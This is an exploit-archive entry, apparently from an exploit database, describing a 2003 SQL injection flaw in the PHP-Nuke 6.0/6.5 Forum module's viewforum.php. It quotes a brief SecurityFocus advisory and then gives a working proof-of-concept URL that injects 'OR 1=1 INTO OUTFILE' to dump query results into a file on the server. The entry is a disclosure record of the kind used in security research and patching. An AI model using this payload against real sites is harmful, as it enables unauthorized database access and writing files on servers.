PHP-Nuke 6.0/6.5 Forum Module - 'viewforum.php' SQL Injection
| EKU-ID: 27904 | CVE: | OSVDB-ID: |
| Author: frog | Published: 2003-03-25 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 27904 | CVE: | OSVDB-ID: |
| Author: frog | Published: 2003-03-25 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/7194/info It has been reported that an input validation error exists in the 'viewforum.php' script included with PHPNuke as part of the Forum module. Because of this, an attacker could send a malicious string through PHPNuke that would allow the attacker to inject SQL commands and queries into the SQL database used by PHPNuke. http://www.example.com/modules.php?op=modload&name=Forums&file=viewforum&forum='%20OR%201=1%20INTO%20OUTFILE%20'[/path]/vf.txt'/*